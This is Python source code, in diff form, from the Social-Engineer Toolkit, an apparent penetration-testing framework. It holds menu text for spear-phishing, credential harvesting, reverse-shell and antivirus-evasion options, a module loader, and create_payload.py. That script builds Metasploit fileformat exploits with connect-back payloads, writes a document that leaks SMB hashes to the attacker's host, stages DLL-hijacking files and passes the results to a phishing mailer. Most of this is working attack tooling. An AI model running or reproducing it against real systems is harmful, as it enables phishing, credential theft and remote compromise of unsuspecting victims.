define_version = get_version()
# check operating system
operating_system = check_os()
# grab metasploit path
msf_path = meta_path()
PORT_NOT_ZERO = "Port cannot be zero!"
PORT_TOO_HIGH = "Let's stick with the LOWER 65,535 ports..."
main_text = " Select from the menu:\n"
main_menu = ['Social-Engineering Attacks',
'Fast-Track Penetration Testing',
'Third Party Modules',
'Update the Metasploit Framework',
'Update the Social-Engineer Toolkit',
'Update SET configuration',
'Help, Credits, and About']
main = ['Spear-Phishing Attack Vectors',
'Website Attack Vectors',
'Infectious Media Generator',
'Create a Payload and Listener',
'Mass Mailer Attack',
'Arduino-Based Attack Vector',
'SMS Spoofing Attack Vector',
'Wireless Access Point Attack Vector',
'QRCode Generator Attack Vector',
'Powershell Attack Vectors',
'Third Party Modules']
spearphish_menu = ['Perform a Mass Email Attack',
'Create a FileFormat Payload',
'Create a Social-Engineering Template',
'0D']
spearphish_text = ("""
The """ + bcolors.BOLD + """Spearphishing""" + bcolors.ENDC + """ module allows you to specially craft email messages and send
them to a large (or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure "Sendmail" is in-
stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
flag to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!
""")
webattack_menu = ['Java Applet Attack Method',
'Metasploit Browser Exploit Method',
'Credential Harvester Attack Method',
'Tabnabbing Attack Method',
'Man Left in the Middle Attack Method',
'Web Jacking Attack Method',
'Multi-Attack Web Method',
'Victim Web Profiler',
'Create or import a CodeSigning Certificate',
'0D']
fasttrack_menu = ['Microsoft SQL Bruter',
'Custom Exploits',
'SCCM Attack Vector',
'Dell DRAC/Chassis Default Checker',
'0D']
fasttrack_text = ("""
Welcome to the Social-Engineer Toolkit - """ + bcolors.BOLD + """Fast-Track Penetration Testing platform""" + bcolors.ENDC + """. These attack vectors
have a series of exploits and automation aspects to assist in the art of penetration testing. SET
now incorporates the attack vectors leveraged in Fast-Track. All of these attack vectors have been
completely rewritten and customized from scratch as to improve functionality and capabilities.
""")
fasttrack_exploits_menu1 = ['MS08-067 (Win2000, Win2k3, WinXP)',
'Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)',
'Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit',
'RDP | Use after Free - Denial of Service',
'MySQL Authentication Bypass Exploit',
'F5 Root Authentication Bypass Exploit',
'0D']
fasttrack_exploits_text1 = ("""
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Exploits Section""" + bcolors.ENDC + """. This
menu has obscure exploits and ones that are primarily python driven. This will continue to grow over time.
""")
fasttrack_mssql_menu1 = ['Scan and Attack MSSQL',
'Connect directly to MSSQL',
'0D']
fasttrack_mssql_text1 = ("""
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Microsoft SQL Brute Forcer""" + bcolors.ENDC + """. This
attack vector will attempt to identify live MSSQL servers and brute force the weak account passwords that
may be found. If that occurs, SET will then compromise the affected system by deploying a binary to
hexadecimal attack vector which will take a raw binary, convert it to hexadecimal and use a staged approach
in deploying the hexadecimal form of the binary onto the underlying system. At this point, a trigger will occur
to convert the payload back to a binary for us.
""")
webattack_text = ("""
The Web Attack module is a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.
The """ + bcolors.BOLD + """Java Applet Attack""" + bcolors.ENDC + """ method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.
The """ + bcolors.BOLD + """Metasploit Browser Exploit""" + bcolors.ENDC + """ method will utilize select Metasploit
browser exploits through an iframe and deliver a Metasploit payload.
The """ + bcolors.BOLD + """Credential Harvester""" + bcolors.ENDC + """ method will utilize web cloning of a web-
site that has a username and password field and harvest all the
information posted to the website.
The """ + bcolors.BOLD + """TabNabbing""" + bcolors.ENDC + """ method will wait for a user to move to a different
tab, then refresh the page to something different.
The """ + bcolors.BOLD + """Man Left in the Middle Attack""" + bcolors.ENDC + """ method was introduced by Kos and
utilizes HTTP REFERER's in order to intercept fields and harvest
data from them. You need to have an already vulnerable site and in-
corporate <script src="http://YOURIP/">. This could either be from a
compromised site or through XSS.
The """ + bcolors.BOLD + """Web-Jacking Attack""" + bcolors.ENDC + """ method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.
The """ + bcolors.BOLD + """Multi-Attack""" + bcolors.ENDC + """ method will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
""")
webattack_vectors_menu = ['Web Templates',
'Site Cloner',
'Custom Import\n',
]
webattack_vectors_text = ("""
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
""")
teensy_menu = ['Powershell HTTP GET MSF Payload',
'WSCRIPT HTTP GET MSF Payload',
'Powershell based Reverse Shell Payload',
'Internet Explorer/FireFox Beef Jack Payload',
'Go to malicious java site and accept applet Payload',
'Gnome wget Download Payload',
'Binary 2 Teensy Attack (Deploy MSF payloads)',
'SDCard 2 Teensy Attack (Deploy Any EXE)',
'SDCard 2 Teensy Attack (Deploy on OSX)',
'X10 Arduino Sniffer PDE and Libraries',
'X10 Arduino Jammer PDE and Libraries',
'Powershell Direct ShellCode Teensy Attack',
'Peensy Multi Attack Dip Switch + SDCard Attack',
'0D']
teensy_text = ("""
The """ + bcolors.BOLD + """Arduino-Based Attack""" + bcolors.ENDC + """ Vector utilizes the Arduin-based device to
program the device. You can leverage the Teensy's, which have onboard
storage and can allow for remote code execution on the physical
system. Since the devices are registered as USB Keyboard's it
will bypass any autorun disabled or endpoint protection on the
system.
You will need to purchase the Teensy USB device, it's roughly
$22 dollars. This attack vector will auto generate the code
needed in order to deploy the payload on the system for you.
This attack vector will create the .pde files necessary to import
into Arduino (the IDE used for programming the Teensy). The attack
vectors range from Powershell based downloaders, wscript attacks,
and other methods.
For more information on specifications and good tutorials visit:
http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html
Special thanks to: IronGeek, WinFang, and Garland
This attack vector also attacks X10 based controllers, be sure to be leveraging
X10 based communication devices in order for this to work.
Select a payload to create the pde file to import into Arduino:
""")
sms_attack_menu = ['Perform a SMS Spoofing Attack',
'Create a Social-Engineering Template',
'0D']
sms_attack_text = ("""
The """ + bcolors.BOLD + """SMS""" + bcolors.ENDC + """ module allows you to specially craft SMS messages and send them
to a person. You can spoof the SMS source.
This module was created by the team at TB-Security.com.
You can use a predefined template, create your own template or specify
an arbitrary message. The main method for this would be to get a user to
click or coax them on a link in their browser and steal credentials or
perform other attack vectors.
""")
wireless_attack_menu = ['Start the SET Wireless Attack Vector Access Point',
'Stop the SET Wireless Attack Vector Access Point',
'0D']
wireless_attack_text = """
The """ + bcolors.BOLD + """Wireless Attack""" + bcolors.ENDC + """ module will create an access point leveraging your
wireless card and redirect all DNS queries to you. The concept is fairly
simple, SET will create a wireless access point, dhcp server, and spoof
DNS to redirect traffic to the attacker machine. It will then exit out
of that menu with everything running as a child process.
You can then launch any SET attack vector you want, for example the Java
Applet attack and when a victim joins your access point and tries going to
a website, will be redirected to your attacker machine.
This attack vector requires AirBase-NG, AirMon-NG, DNSSpoof, and dhcpd3.
"""
infectious_menu = ['File-Format Exploits',
'Standard Metasploit Executable',
'0D']
infectious_text = """
The """ + bcolors.BOLD + bcolors.GREEN + """Infectious """ + bcolors.ENDC + """USB/CD/DVD module will create an autorun.inf file and a
Metasploit payload. When the DVD/USB/CD is inserted, it will automatically
run if autorun is enabled.""" + bcolors.ENDC + """
Pick the attack vector you wish to use: fileformat bugs or a straight executable.
"""
# used in create_payloads.py
if operating_system != "windows":
if msf_path != False:
payload_menu_1 = [
'Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker',
'Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker',
'Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker',
'Windows Bind Shell Execute payload and create an accepting port on remote system',
'Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline',
'Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline',
'Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter',
'Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports',
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter',
'Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter',
'SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET',
'SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support',
'RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP',
'ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec',
'PyInjector Shellcode Injection This will drop a meterpreter payload through PyInjector',
'MultiPyInjector Shellcode Injection This will drop multiple Metasploit payloads via memory',
'Import your own executable Specify a path for your own executable\n']
if operating_system == "windows" or msf_path == False:
payload_menu_1 = [
'SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET',
'SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support',
'RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP\n']
payload_menu_1_text = """
What payload do you want to generate:
Name: Description:
"""
# used in gen_payload.py
payload_menu_2 = [
'Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker',
'Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker',
'Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker',
'Windows Bind Shell Execute payload and create an accepting port on remote system.',
'Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline',
'Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline',
'Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter',
'Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports',
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter',
'Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter',
'Download/Run your Own Executable Downloads an executable and runs it\n'
]
payload_menu_2_text = """\n"""
payload_menu_3_text = ""
payload_menu_3 = [
'Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker',
'Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker',
'Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker',
'Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline',
'Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter',
'Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system',
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter\n']
# called from create_payload.py associated dictionary = ms_attacks
create_payloads_menu = [
'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)',
'SET Custom Written Document UNC LM SMB Capture Attack',
'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow',
'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)',
'Adobe Flash Player "Button" Remote Code Execution',
'Adobe CoolType SING Table "uniqueName" Overflow',
'Adobe Flash Player "newfunction" Invalid Pointer Use',
'Adobe Collab.collectEmailInfo Buffer Overflow',
'Adobe Collab.getIcon Buffer Overflow',
'Adobe JBIG2Decode Memory Corruption Exploit',
'Adobe PDF Embedded EXE Social Engineering',
'Adobe util.printf() Buffer Overflow',
'Custom EXE to VBA (sent via RAR) (RAR required)',
'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun',
'Adobe PDF Embedded EXE Social Engineering (NOJS)',
'Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow',
'Apple QuickTime PICT PnSize Buffer Overflow',
'Nuance PDF Reader v6.0 Launch Stack Buffer Overflow',
'Adobe Reader u3D Memory Corruption Vulnerability',
'MSCOMCTL ActiveX Buffer Overflow (ms12-027)\n']
create_payloads_text = """
Select the file format exploit you want.
The default is the PDF embedded EXE.\n
********** PAYLOADS **********\n"""
browser_exploits_menu = [
'Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)',
'Java 7 Applet Remote Code Execution (2012-08-26)',
'Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)',
'Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)',
'Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)',
'MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)',
'Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)',
'Adobe Flash Player Object Type Confusion (2012-05-04)',
'Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)',
'MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)',
'Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)',
'MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)',
'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)',
'Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)',
'Internet Explorer CSS Import Use After Free (2010-11-29)',
'Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)',
'Internet Explorer CSS Tags Memory Corruption (2010-11-03)',
'Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)',
'Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)',
'Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)',
'Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)',
'Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)',
'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)',
'Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)',
'Microsoft Help Center XSS and Command Execution (2010-06-09)',
'Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)',
'Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)',
'Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)',
'Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)',
'Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)',
'Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)',
'Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)',
'Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)',
'FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)',
'FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)',
'Metasploit Browser Autopwn (USE AT OWN RISK!)\n']
browser_exploits_text = """
Enter the browser exploit you would like to use [8]:
"""
# this is for the powershell attack vectors
powershell_menu = ['Powershell Alphanumeric Shellcode Injector',
'Powershell Reverse Shell',
'Powershell Bind Shell',
'Powershell Dump SAM Database',
'0D']
powershell_text = ("""
The """ + bcolors.BOLD + """Powershell Attack Vector""" + bcolors.ENDC + """ module allows you to create PowerShell specific attacks. These attacks will allow
you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell
provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by
preventative technologies.
""")
encoder_menu = ['avoid_utf8_tolower (Normal)',
'shikata_ga_nai (Very Good)',
'alpha_mixed (Normal)',
'alpha_upper (Normal)',
'call4_dword_xor (Normal)',
'countdown (Normal)',
'fnstenv_mov (Normal)',
'jmp_call_additive (Normal)',
'nonalpha (Normal)',
'nonupper (Normal)',
'unicode_mixed (Normal)',
'unicode_upper (Normal)',
'alpha2 (Normal)',
'No Encoding (None)',
'Multi-Encoder (Excellent)',
'Backdoored Executable (BEST)\n']
encoder_text = """
Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.
"""
dll_hijacker_text = """
The DLL Hijacker vulnerability will allow normal file extenstions to
call local (or remote) .dll files that can then call your payload or
executable. In this scenario it will compact the attack in a zip file
and when the user opens the file extension, will trigger the dll then
ultimately our payload. During the time of this release, all of these
file extensions were tested and appear to work and are not patched. This
will continiously be updated as time goes on.
"""
fakeap_dhcp_menu = ['10.0.0.100-254',
'192.168.10.100-254\n']
fakeap_dhcp_text = "Please choose which DHCP Config you would like to use: "
banner_text = bcolors.BLUE + """
[---] The Social-Engineer Toolkit (""" + bcolors.YELLOW + """SET""" + bcolors.BLUE+""") [---]
[---] Written by:""" + bcolors.RED + """ David Kennedy """ + bcolors.BLUE + """(""" + bcolors.YELLOW + """ReL1K""" + bcolors.BLUE + """) [---]
[---] Development Team: """ + bcolors.RED + """Thomas Werth""" + bcolors.BLUE + """ [---]
[---] Development Team: """ + bcolors.RED + """JR DePre (pr1me)""" + bcolors.BLUE + """ [---]
[---] Development Team: """ + bcolors.RED + """Joey Furr (j0fer)""" + bcolors.BLUE + """ [---]
[---] Development Team: """ + bcolors.RED + """Garland""" + bcolors.BLUE + """ [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """Convergence Edition""" + bcolors.BLUE + """' [---]
[---] Report """ + bcolors.RED +"""bugs""" + bcolors.BLUE + """ to:"""+ bcolors.GREEN + """ davek@secmaniac.com """ + bcolors.BLUE+"""[---]
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """dave_rel1k""" + bcolors.BLUE+""" [---]
[---] Homepage: """ + bcolors.YELLOW + """http://www.secmaniac.com""" + bcolors.BLUE+""" [---]
""" + bcolors.GREEN + """ Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..
""" + '\n' + bcolors.BLUE + """ DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.\n""" + bcolors.ENDC

81
src/core/module_handler.py Normal file
View file

@ -0,0 +1,81 @@
#!/usr/bin/env python
## module_handler.py
import glob
import re
import sys
from src.core.setcore import *
# this is just if the user wants to return to menu
menu_return = "false"
# base counter to identify numbers
counter = 0
# get the menu going
print "\n"
print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.")
print_info_spaces("Please read the readme/modules.txt for information on how to create your own modules.\n")
for name in glob.glob("modules/*.py"):
counter = counter + 1
fileopen = file(name, "r")
for line in fileopen:
line = line.rstrip()
match = re.search("MAIN=", line)
if match:
line = line.replace('MAIN="', "")
line = line.replace('"', "")
line = " " + str(counter) + ". " + line
print line
print "\n 99. Return to the previous menu\n"
choice = raw_input(setprompt(["9"], ""))
if choice == 'exit':
exit_set()
if choice == '99':
menu_return = "true"
# throw error if not integer
try:
choice = int(choice)
except:
print_warning("An integer was not used try again")
choice = raw_input(setprompt(["9"], ""))
# start a new counter to match choice
counter = 0
if menu_return == "false":
# pull any files in the modules directory that starts with .py
for name in glob.glob("modules/*.py"):
counter = counter+1
if counter == int(choice):
# get rid of .modules extension
name = name.replace("modules/", "")
# get rid of .py extension
name = name.replace(".py", "")
# changes our system path to modules so we can import the files
sys.path.append("modules/")
# this will import the third party module
try:
exec("import " + name)
except:
pass
# this will call the main() function inside the python file
# if it doesn't exist it will still continue just throw a warning
try:
exec("%s.main()" % (name))
# handle the exception if main isn't there
except Exception, e:
raw_input(" [!] There was an issue with a module: %s." % (e))
return_continue()

0
src/core/msf_attacks/__init__.py Normal file
View file

279
src/core/msf_attacks/create_payload.py Normal file
View file

@ -0,0 +1,279 @@
#!/usr/bin/python
## PDF spear phishing attack here
import subprocess
import re
import sys
import os
import socket
import pexpect
import time
from src.core.setcore import *
from src.core.dictionaries import *
from src.core.menu.text import *
me = mod_name()
definepath=os.getcwd()
define_version = get_version()
users_home = os.getenv("HOME")
# metasploit path
meta_path=meta_path()
# define if we need apache or not for dll hijacking
# define if use apache or not
apache=0
# open set_config
apache_check=file("%s/config/set_config" % (definepath),"r").readlines()
# loop this guy to search for the APACHE_SERVER config variable
for line in apache_check:
# strip \r\n
line=line.rstrip()
# if apache is turned on get things ready
match=re.search("APACHE_SERVER=ON",line)
# if its on lets get apache ready
if match:
for line2 in apache_check:
# set the apache path here
match2=re.search("APACHE_DIRECTORY=", line2)
if match2:
line2=line2.rstrip()
apache_path=line2.replace("APACHE_DIRECTORY=","")
apache=1
###################################################
# USER INPUT: SHOW PAYLOAD MENU #
###################################################
inputpdf=""
target=""
exploit = "INVALID"
while exploit == "INVALID":
debug_msg(me,"printing 'src.core.menu.text.create_payloads_menu'",5)
show_payload_menu1 = create_menu(create_payloads_text, create_payloads_menu)
exploit = raw_input(setprompt(["4"], ""))
print "\n"
# Do conditional checks for the value of 'exploit', which should be a number
# Handle any additional tasks before doing the dictionary lookup and
# converting the user returned value to the metasploit string
# here we specify if its a pdf or rtf
if exploit == 'exit':
exit_set()
if exploit == "":
exploit='1' # 'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)'
if exploit == '3': #'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow'
outfile=("template.doc")
if exploit == '4': #'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
outfile=("template.rtf")
target=("TARGET=1")
if exploit == "5":
outfile = ("template.mov")
if exploit != '3' and exploit != '4' and exploit !="17":
outfile=("template.pdf")
debug_msg(me,'current input was read as: %s' % exploit,3)
exploit=ms_attacks(exploit)
debug_msg(me,'value was translated to: %s' % exploit,3)
if exploit == "INVALID":
print_warning("that choice is invalid...please try again or press ctrl-c to Cancel.")
time.sleep(2)
# 'exploit' has been converted to the string by now, so we need to
# evaluate the string instead of the user input number from here on...
if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs":
print_info("Default payload creation selected. SET will generate a normal PDF with embedded EXE.")
print """
1. Use your own PDF for attack
2. Use built-in BLANK PDF for attack\n"""
choicepdf = raw_input(setprompt(["4"], ""))
if choicepdf == 'exit':
exit_set()
if choicepdf == '1':
# define if user wants to use their own pdf or built in one
inputpdf=raw_input(setprompt(["4"], "Enter path to your pdf [blank-builtin]"))
# if blank, then default to normal pdf
if inputpdf == "":
# change to default SET pdf
print_info("Defaulting to BLANK PDF built into SET...")
inputpdf="INFILENAME=src/core/msf_attacks/form.pdf"
# if no file exists defalt this
if not os.path.isfile(inputpdf):
print_warning("Unable to find PDF, defaulting to blank PDF.")
inputpdf="INFILENAME=src/core/msf_attacks/form.pdf"
# if pdf exists, we are good
if os.path.isfile(inputpdf):
inputpdf="INFILENAME="+inputpdf
if choicepdf == '2':
inputpdf="INFILENAME=src/core/msf_attacks/form.pdf"
if choicepdf == "":
inputpdf="INFILENAME=src/core/msf_attacks/form.pdf"
exploit_counter=0
if exploit == "dll_hijacking" or exploit == "unc_embed":
exploit_counter=1
if exploit_counter == 0:
###################################################
# USER INPUT: SHOW PAYLOAD MENU 3 #
###################################################
debug_msg(me,"printing 'src.core.menu.text.payload_menu_3'",5)
show_payload_menu3 = create_menu(payload_menu_3_text, payload_menu_3)
payload=raw_input(setprompt(["4"], ""))
noencode=0
if payload == 'exit':
exit_set()
if payload == "" : payload="2"
if payload == '4' or payload == '5' or payload == '6':
noencode=1
payload=ms_payload_3(payload)
# imported from central, grabs ip address
rhost=grab_ipaddress()
# SET LPORT
lport=raw_input(setprompt(["4"], "Port to connect back on [443]"))
# if blank default to 443
if lport == "":
lport="443"
print_info("Defaulting to port 443...")
# SET FILE OUTPATH
# /root/.msf4/local/msf.pdf
filename_code = outfile
outpath=(users_home + "/.msf4/local/" + outfile)
print_info("Generating fileformat exploit...")
# START THE EXE TO VBA PAYLOAD
if exploit != 'custom/exe/to/vba/payload':
outfile = "%s/src/program_junk/%s" % (definepath,outfile)
subprocess.Popen("ruby %s/msfcli %s PAYLOAD=%s LHOST=%s LPORT=%s OUTPUTPATH=%s FILENAME=%s %s ENCODING=shikata_ga_nai %s E" % (meta_path,exploit,payload,rhost,lport,outpath,outfile,target,inputpdf), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
subprocess.Popen("cp " + users_home + "/.msf4/local/%s src/program_junk/" % (filename_code), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
print_status("Payload creation complete.")
time.sleep(1)
print_status("All payloads get sent to the %s directory" % (outfile))
if exploit == 'custom/exe/to/vba/payload':
# Creating Payload here
# if not 64 specify raw output and filename of vb1.exe
if noencode == 0:
execute1=("R")
payloadname=("vb1.exe")
if noencode == 1:
execute1=("X")
payloadname=("vb.exe")
subprocess.Popen("ruby %s/msfpayload %s %s %s ENCODING=shikata_ga_nai %s > src/program_junk/%s" % (meta_path,payload,rhost,lport,execute1,payloadname), shell=True).wait()
if noencode == 0:
subprocess.Popen("ruby %s/msfencode -e x86/shikata_ga_nai -i src/program_junk/vb1.exe -o src/program_junk/vb.exe -t exe -c 3" % (meta_path), shell=True).wait()
# Create the VB script here
subprocess.Popen("%s/tools/exe2vba.rb src/program_junk/vb.exe src/program_junk/template.vbs" % (meta_path), shell=True).wait()
print_info("Raring the VBS file.")
subprocess.Popen("rar a src/program_junk/template.rar src/program_junk/template.vbs", shell=True).wait()
# NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER
filewrite=file("src/program_junk/payload.options","w")
filewrite.write(payload+" "+rhost+" "+lport)
filewrite.close()
if exploit != "dll_hijacking":
if not os.path.isfile("src/program_junk/fileformat.file"):
sys.path.append("src/phishing/smtp/client/")
debug_msg(me,"importing 'src.phishing.smtp.client.smtp_client'",1)
try: reload(smtp_client)
except: import smtp_client
# start the unc_embed attack stuff here
if exploit == "unc_embed":
rhost=grab_ipaddress
import string,random
def random_string(minlength=6,maxlength=15):
length=random.randint(minlength,maxlength)
letters=string.ascii_letters+string.digits
return ''.join([random.choice(letters) for _ in range(length)])
rand_gen=random_string()
filewrite=file("src/program_junk/unc_config", "w")
filewrite.write("use server/capture/smb\n")
filewrite.write("exploit -j\n\n")
filewrite.close()
filewrite=file("src/program_junk/template.doc", "w")
filewrite.write(r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' %(rhost,rand_gen))
filewrite.close()
sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'",1)
try: reload(smtp_client)
except: import smtp_client
# start the dll_hijacking stuff here
if exploit == "dll_hijacking":
sys.path.append("src/core/payloadgen")
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'",1)
try: reload(create_payloads)
except: import create_payloads
sys.path.append("src/webattack/dll_hijacking")
debug_msg(me, "importing 'src.webattack.dll_hijacking.hijacking'",1)
try: reload(hijacking)
except: import hijacking
# if we are not using apache
if apache == 0:
if not os.path.isfile("%s/src/program_junk/fileformat.file" % (definepath)):
# try:
filewrite=file("src/program_junk/attack_vector","w")
filewrite.write("hijacking")
filewrite.close()
filewrite=file("src/program_junk/site.template","w")
filewrite.write("TEMPLATE=CUSTOM")
filewrite.close()
time.sleep(1)
subprocess.Popen("mkdir src/program_junk/web_clone;cp src/html/msf.exe src/program_junk/web_clone/x", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
child=pexpect.spawn("python src/html/web_server.py")
# except: child.close()
# if we are using apache
if apache == 1:
subprocess.Popen("cp src/html/msf.exe %s/x.exe" % (apache_path), shell=True).wait()
if os.path.isfile("src/program_junk/meta_config"):
# if we aren't using the infectious method then do normal routine
if not os.path.isfile("%s/src/program_junk/fileformat.file" % (definepath)):
print_info("This may take a few to load MSF...")
try:
child1=pexpect.spawn("ruby %s/msfconsole -L -n -r src/program_junk/meta_config" % (meta_path))
except:
try:
child1.close()
except: pass
# get the emails out
# if we aren't using the infectious method then do the normal routine
if not os.path.isfile("%s/src/program_junk/fileformat.file" % (definepath)):
sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'",1)
try: reload(smtp_client)
except: import smtp_client
try:
child1.interact()
except:
if apache == 0:
try:
child.close()
child1.close()
except: pass

9
src/core/msf_attacks/database/msf.database Normal file
View file

@ -0,0 +1,9 @@
exploit/windows/fileformat/adobe_collectemailinfo Adobe Collab.collectEmailInfo() Buffer Overflow
exploit/windows/fileformat/adobe_geticon Adobe Collab.getIcon() Buffer Overflow
exploit/windows/fileformat/adobe_jbig2decode Adobe JBIG2Decode Memory Corruption Exploit
exploit/windows/fileformat/adobe_pdf_embedded_exe Adobe PDF Embedded EXE Social Engineering
exploit/windows/fileformat/adobe_utilprintf Adobe util.printf() Buffer Overflow
exploit/windows/fileformat/adobe_u3d_meshdecl Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
exploit/windows/fileformat/adobe_flatedecode_predictor02 Adobe FlateDecode Stream Predictor 02 Integer Overflow
exploit/windows/fileformat/adobe_media_newplayer Adobe Doc.media.newPlayer Use After Free Vulnerability

BIN
src/core/msf_attacks/form.pdf Normal file
View file

Binary file not shown.

15
src/core/msf_attacks/msf_list.py Normal file
View file

@ -0,0 +1,15 @@
#!/usr/bin/python
from src.core.setcore import debug_msg, mod_name
import subprocess
import re
import sys
me = mod_name()
sys.path.append("src/core")
debug_msg(me,"re-importing 'src.core.setcore'",1)
try: reload(setcore)
except: import setcore
print "[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]"
